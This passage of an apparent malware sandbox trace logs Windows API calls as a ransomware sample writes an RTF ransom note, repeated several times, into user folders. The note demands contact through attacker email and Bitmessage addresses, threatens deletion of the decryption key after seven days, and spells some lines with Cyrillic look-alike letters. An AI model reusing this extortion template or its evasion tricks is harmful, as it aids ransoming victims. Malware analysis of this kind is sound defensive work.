\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.160] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.161] CloseHandle (hObject=0x2ec) returned 1 [0291.161] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\#readme_eman#.rtf")) returned 0xffffffff [0291.161] GetLastError () returned 0x2 [0291.161] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.161] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.161] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.161] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 